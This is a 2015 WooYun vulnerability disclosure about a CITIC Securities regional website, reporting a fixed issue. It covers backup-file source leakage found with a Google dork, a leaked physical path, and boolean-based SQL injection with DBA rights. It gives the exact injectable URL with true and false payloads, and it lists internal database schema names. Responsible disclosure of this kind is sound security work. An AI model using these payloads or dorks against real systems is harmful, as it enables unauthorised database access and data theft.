当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092831

漏洞标题:中信证券某省主站注入等问题打包(dba权限10+用户库泄露漏洞打包)

相关厂商:中信证券

漏洞作者: 工蚁

提交时间:2015-01-20 13:00

修复时间:2015-03-04 13:43

公开时间:2015-03-04 13:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

源码泄露
物理路径泄露
dba权限sql注入

详细说明:

1.源码泄露:
google:
site:bigsun.com.cn filetype:bak

1.png


2.物理路径泄露:
https://www.bigsun.com.cn/zxjt/zqzl/qzzl/lcjsp/SQLInclude_Info.jsp

2.png


3.sql注入

https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001

原始请求

3.png


https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 and %271%27=%271

返回真

4.png


https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 and %272%27=%271

返回假

5.png


漏洞证明:

注入类型:字符bool型&报错类型。

6.png


53个库:

7.png


dba权限:

8.png


用户库十多个:
[*] ZXJT_ANALYSESCHEMEUSER
[*] ZXJT_BASEDATAUSER
[*] ZXJT_BONDFUNDUSER
[*] ZXJT_CMSUSER
[*] ZXJT_CMSUSERHISTORY
[*] ZXJT_EBIZUSER
[*] ZXJT_ECSNLOGUSER
[*] ZXJT_FORUMUSER
[*] ZXJT_GROCERYUSER
[*] ZXJT_HQUSER
[*] ZXJT_INFOUSER
[*] ZXJT_MRCHUSER
[*] ZXJT_PERSONALUSER
[*] ZXJT_PORTFOLIOUSER
[*] ZXJT_PROTALUSER
[*] ZXJT_TRADUSER
[*] ZXJT_UMUSER
仅以下图证明可跨裤查询,并未拖取具体数据:

9.png


修复方案:

严重性你们应该懂,赶紧修复吧。

版权声明:转载请注明来源 工蚁@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-20 13:16

厂商回复:

非常感谢,已经确认并紧急处置。

最新状态:

2015-03-04:应用漏洞已经修复,bak文件已经删除,等待google更新缓存。

2015-03-04:已经修复完成